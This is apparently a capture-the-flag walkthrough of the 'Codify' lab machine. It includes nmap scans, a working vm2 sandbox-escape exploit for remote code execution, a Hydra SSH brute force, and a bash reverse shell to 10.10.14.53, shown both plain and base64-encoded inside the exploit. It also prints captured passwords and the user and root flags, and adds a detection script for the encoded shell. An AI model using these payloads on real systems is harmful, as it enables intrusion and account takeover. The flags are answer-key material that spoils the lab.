# Codify

## Initial Scan

```bash
sudo nmap -T4 -v 10.129.82.199
sudo nmap -T4 -Pn -p 22,80,3000 -sV -sC -v 10.129.82.199 -oA Codify
```

<figure><img src="/files/dIl15dO8hxlRaU5CFhDC" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/0TrLdkOyyNqildFRyBpt" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/CzxcCvhlSfgXUYT6fUPC" alt=""><figcaption></figcaption></figure>

## HTTP

Had to edit the hosts file to get the webpage.

<figure><img src="/files/tsLJeupDyplnNMPajRRN" alt=""><figcaption></figcaption></figure>

Checking out their About Us page

<figure><img src="/files/w5Q6dPAFw1KefHGllypl" alt=""><figcaption></figcaption></figure>

Looking around for vm2 CVEs, I found [this article on Snyk](https://security.snyk.io/vuln/SNYK-JS-VM2-5537100) about RCE with vm2 after seeing a couple of others. Testing the other PoCs, I didn't get anywhere until I found this one. We can run commands on the host, bypassing the VM.

```javascript
const { VM } = require("vm2");
const vm = new VM();

const code = `
  const err = new Error();
  err.name = {
    toString: new Proxy(() => "", {
      apply(target, thiz, args) {
        const process = args.constructor.constructor("return process")();
        throw process.mainModule.require("child_process").execSync("ls -al").toString();
      },
    }),
  };
  try {
    err.stack;
  } catch (stdout) {
    stdout;
  }
`;

console.log(vm.run(code)); // -> hacked
```

<figure><img src="/files/64qPzCeWfohLfKm1XN02" alt=""><figcaption></figcaption></figure>

`whoami` shows us the `svc` user. Also, looking at `/etc/passwd`, we see an additional user, `joshua`.

<figure><img src="/files/zOB4iG9ZxbMDGMS7EaQR" alt=""><figcaption></figcaption></figure>

### BruteForce

Trying to run Hydra against the user joshua for a password

```bash
hydra -l joshua -P /usr/share/wordlists/rockyou.txt -V ssh://10.129.82.199
```

<figure><img src="/files/Lq7qHnUuoOPReDZuU2u2" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/5g47fRXLALB2Fyz3gxZu" alt=""><figcaption></figcaption></figure>

`joshua:spongebob1`

### Obtaining shell

Working to get a shell as svc. Looking around for reverse shells, I found [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#bash-tcp).

```bash
bash -i >& /dev/tcp/10.10.14.53/1234 0>&1
```

Running it normally didn't work so I encoded it

```bash
echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC41My8xMjM0IDA+JjE=' | base64 -d | bash
```

Full command

```javascript
const { VM } = require("vm2");
const vm = new VM();

const code = `
  const err = new Error();
  err.name = {
    toString: new Proxy(() => "", {
      apply(target, thiz, args) {
        const process = args.constructor.constructor("return process")();
        throw process.mainModule.require("child_process").execSync("echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC41My8xMjM0IDA+JjE=' | base64 -d | bash").toString();
      },
    }),
  };
  try {
    err.stack;
  } catch (stdout) {
    stdout;
  }
`;

console.log(vm.run(code)); // -> hacked
```
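
Seen from the defending side, the encoded command above shows up in process telemetry as a shell spawned by `node` that pipes `base64 -d` into `bash`. The following triage code is an added example, not part of the original walkthrough; the event fields, the sample events and the `192.0.2.10` address are constructed assumptions.

```javascript
// Added example: flag "decode-and-pipe-to-shell" children of a Node.js service.
// Event shape (pid, parent, user, cmd) is an assumed, simplified audit record.
const DECODE_TO_SHELL = /base64\s+(-d|--decode)\b[^|]*\|\s*(ba|da|z)?sh\b/;
const B64_LITERAL = /[A-Za-z0-9+/]{16,}={0,2}/g;
const NETWORK_MARKERS = ["/dev/tcp/", "/dev/udp/"];

// Decode every base64-looking token in the command line and return the
// ones that decode to printable text.
function decodedLiterals(cmd) {
  const out = [];
  for (const token of cmd.match(B64_LITERAL) || []) {
    const text = Buffer.from(token, "base64").toString("utf8");
    if (/^[\x20-\x7e\s]+$/.test(text)) out.push(text);
  }
  return out;
}

// Collect the independent reasons one event looks suspicious.
function inspect(event) {
  const reasons = [];
  if (event.parent === "node" && /(^|\/)(ba|da|z)?sh\b/.test(event.cmd)) {
    reasons.push("shell spawned by node");
  }
  if (DECODE_TO_SHELL.test(event.cmd)) reasons.push("base64 decode piped to shell");
  for (const text of decodedLiterals(event.cmd)) {
    if (NETWORK_MARKERS.some((m) => text.includes(m))) {
      reasons.push("encoded payload opens a network socket");
    }
  }
  return reasons;
}

// Require two or more reasons so a lone benign shell-out is not flagged.
function triage(events) {
  return events
    .map((e) => ({ pid: e.pid, reasons: inspect(e) }))
    .filter((r) => r.reasons.length >= 2);
}

// Constructed sample events; 192.0.2.10 is a documentation address.
const encoded = Buffer.from("bash -i >& /dev/tcp/192.0.2.10/4444 0>&1").toString("base64");
const SAMPLE_EVENTS = [
  { pid: 2101, parent: "node", user: "svc", cmd: "/bin/sh -c git --version" },
  { pid: 2102, parent: "node", user: "svc", cmd: `/bin/sh -c echo '${encoded}' | base64 -d | bash` },
  { pid: 2103, parent: "cron", user: "root", cmd: "/bin/sh -c base64 -d /tmp/in.b64 > /tmp/out.bin" },
];

console.log(JSON.stringify(triage(SAMPLE_EVENTS), null, 2));
```

Only the second event is reported: the first is a plain shell-out from the service, and the third decodes a file without handing it to a shell.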

## Foothold

We have a shell as svc.

<figure><img src="/files/CbaNosFZi4RXhVotAOHa" alt=""><figcaption></figcaption></figure>

Seeing what permissions we have

<figure><img src="/files/4mz77sOGzBK88bp1Cx8L" alt=""><figcaption></figcaption></figure>

## User Flag

After getting into a shell from the svc user, I got joshua's password with Hydra.

<figure><img src="/files/dsP8MdRwNzV0WW8cBylw" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/PW5Euhsh0ScHisVxWHFw" alt=""><figcaption></figcaption></figure>

User flag: `c53cdd4688463871ba3f4020ab6f3ccb`

## Priv Esc

<figure><img src="/files/rTtdcwnUgMJ3P0l7PM7w" alt=""><figcaption></figcaption></figure>

We have the note "User joshua may run the following commands on codify: (root) /opt/scripts/mysql-backup.sh", so looking at the shell file:

<figure><img src="/files/i5I1NBGhoeOBXAzsb5Yi" alt=""><figcaption></figcaption></figure>

Running that as root, we get:

<figure><img src="/files/z5hfqx6lwljXQwASD1hV" alt=""><figcaption></figcaption></figure>

Get [pspy](https://github.com/DominicBreuker/pspy). Initiate another SSH session, get pspy64 onto the target machine, run it, then run the `/opt/scripts/mysql-backup.sh` script.

<figure><img src="/files/doBjsltHq9n58LSDuHMN" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/1lwkvuJYuWMohDgnfcgP" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/VoDAHmH6bJNBBABdSJBr" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/qTZYodQVCtmafbrfnGuF" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/ZAoIPJF66ZsNqKoNbMct" alt=""><figcaption></figcaption></figure>

Root pass: `kljh12k3jhaskjh12kjh3`

<figure><img src="/files/Tq3fpYFhErP2Wq511UVE" alt=""><figcaption></figcaption></figure>

Root flag: `4e43f866588b3b3433196af3cef8b768`


